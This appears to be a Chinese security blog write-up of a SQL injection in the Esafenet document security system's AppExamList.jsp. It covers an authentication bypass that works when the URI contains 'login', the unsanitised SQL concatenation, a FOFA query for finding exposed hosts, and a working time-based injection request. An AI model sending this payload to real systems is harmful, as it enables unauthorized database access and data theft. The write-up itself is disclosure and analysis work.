亿赛通电子文档安全管理系统 AppExamList.jsp SQL注入漏洞


漏洞简介

亿赛通电子文档安全管理系统的AppExamList.jsp接口存在SQL注入漏洞。攻击者可以通过构造特定的POST请求,在多个参数如username、AppTate、startTime、endTime中注入恶意SQL代码,利用该漏洞对数据库执行任意SQL操作。攻击者可以通过注入WAITFOR DELAY命令,导致数据库响应时间延迟,从而确认SQL注入的成功。此漏洞可能导致数据库中的敏感信息泄露、篡改或删除,严重威胁系统的安全性和数据完整性。

影响版本

fofa语法

app="亿赛通-电子文档安全管理系统" || body="/CDGServer3/index.jsp"

漏洞分析

PS: 相关权限绕过简析如下

public class WebController extends HttpServlet {
    private static final Class[] SERVICE_PARAMS = new Class[]{HttpServletRequest.class, HttpServletResponse.class};

    protected void service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        Object[] actionParams = new Object[]{request, response};
        String actionName = request.getParameter("command");
        String fromurl = request.getParameter("fromurl");
        if (this.isRepeat(request) && fromurl != null && !"".equals(fromurl)) {
            request.getRequestDispatcher(fromurl).forward(request, response);
        } else if (actionParams != null && actionName != null && !"".equals(actionName) && !"null".equals(actionName)) {
            LoginMng loginMng = (LoginMng)request.getSession().getAttribute("loginMng");
            String clienturl = request.getRequestURI();
            if (clienturl != null && (clienturl.indexOf("login") != -1 || clienturl.indexOf("SystemConfig") != -1) || loginMng != null && loginMng.isLogin()) {
                try {
                    Method actionFunc = this.getClass().getDeclaredMethod("action" + actionName, SERVICE_PARAMS);
                    actionFunc.setAccessible(true);
                    actionFunc.invoke(this, actionParams);

只要uri包含 login 或者 SystemConfig 即可满足条件,然后将action与传递进来的command进行拼接后反射调用对应的方法。

直接看到 AppExamList.jsp 的实现逻辑

<%
        //        String username = RequestUtil.getParameter(request, "username", "");
        String username = request.getParameter("username");
        String AppTate = RequestUtil.getParameter(request, "AppTate", "3");
        String startTime = RequestUtil.getParameter(request, "startTime",
                        "");
        String endTime = RequestUtil.getParameter(request, "endTime", "");

        int currPage = RequestUtil.getIntParameter(request, "curpage", 1); //当前是第几页
        PageUtil pageutil = null;

        ApprovalDAO appdao = new ApprovalDAO();
        List list = new ArrayList();
        pageutil = appdao.getApprovalListbyUser(currPage,username, startTime, endTime,
                        "DecryptApp", AppTate);

多个参数如username、startTime、endTime这些会被带入getApprovalListbyUser方法,跟进查看getApprovalListbyUser实现方式

public PageUtil getApprovalListbyUser(int curPage, String AppUserID, String startime, String endtime, String AppCategory, String IsApproval) throws Exception {
    List<DecryptApplicationInfo> list = new ArrayList();
    StringBuffer sql = new StringBuffer();
    sql.append("select * from DecryptApplication where UserName='" + AppUserID + "'");
    if (startime != null && !startime.equals("")) {
        startime = startime + " 00:00:00";
        endtime = endtime + " 24:00:00";
        sql.append(" and applicateTime <='" + endtime + "' and applicateTime >='" + startime + "'");
    }

    if (IsApproval.equals("0")) {
        sql.append(" and IsApproval = '0' and HasExam = '1'");
    } else if (IsApproval.equals("1")) {
        sql.append(" and IsApproval = '1'");
    } else if (IsApproval.equals("2")) {
        sql.append(" and HasExam = '0'");
    }

    sql.append("  order by ApplicateTime desc");
    PageUtil pageutil = PageFactory.getInstance(sql.toString(), "Uniqueid", curPage);
    HashMap[] maps = null;
    maps = this.getCommonResults(pageutil.getNewSql());
    if (maps != null && maps.length > 0) {
        for(int i = 0; i < maps.length; ++i) {
            list.add(DecryptApplicationDao.MapToInfo(maps[i]));
        }
    }

    pageutil.setRecords(list);
    return pageutil;
}

可见参数username、startTime、endTime等全程未经任何过滤和校验就被直接拼接进sql语句中进行执行,从而导致sql注入漏洞。

漏洞复现

POST /CDGServer3/client/AppExamList.jsp;Servicelogin HTTP/1.1
Host: esafenet.mrxn.net
Content-Type: application/x-www-form-urlencoded

username=1'WAITFOR+DELAY'0%3a0%3a3'--

成功延时 3 秒


手机扫码阅读

汉王e脸通综合管理平台 queryVehicleAccessRecord.do SQL注入漏洞

万户OA jigeObj_iframe.jsp SQL注入漏洞

评 论
avatar
2h
请问为什么会加上;Servicelogin
1 年前 回复
avatar
Mrxn
@2h:看代码分析部分啊 url包含特定值就鉴权成功啊
1 年前 回复